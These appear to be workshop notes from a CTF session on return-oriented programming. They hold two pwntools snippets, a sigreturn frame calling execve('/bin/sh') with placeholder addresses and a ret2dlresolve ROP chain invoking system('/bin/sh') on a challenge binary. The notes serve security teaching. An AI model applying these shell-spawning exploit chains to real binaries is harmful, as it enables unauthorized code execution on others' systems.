from pwn import *
BIN_SH = 0xcafebabe # addr of "/bin/sh\x00"
SYSCALL = 0xdeadbeef # addr of syscall instruction
frame = SigreturnFrame(kernel="amd64")
frame.rax = constants.SYS_execve
frame.rdi = BIN_SH
frame.rsi = 0x0
frame.rdx = 0x0
frame.rip = SYSCALL
payload = bytes(frame)
Talk
from pwn import *
exe = context.binary = ELF('challenge')
dlresolve = Ret2dlresolvePayload(exe, symbol="system", args=["/bin/sh\x00"])
# dlresolve.data_addr # Addr of RW memory area
# dlresolve.payload # fake structures
rop = ROP(exe)
rop.read(0, dlresolve.data_addr) # ROP to read fake structures
rop.ret2dlresolve(dlresolve) # ROP to call _dl_runtime_resolve
>
raw_rop = rop.chain() # Full ROP chain
Talk
backlinks:
- /workshops/2022/ctf-foo/04-30-ctf-foo-rop/
emile - 1712771337.413583s - generated using vokobe "0.1.3"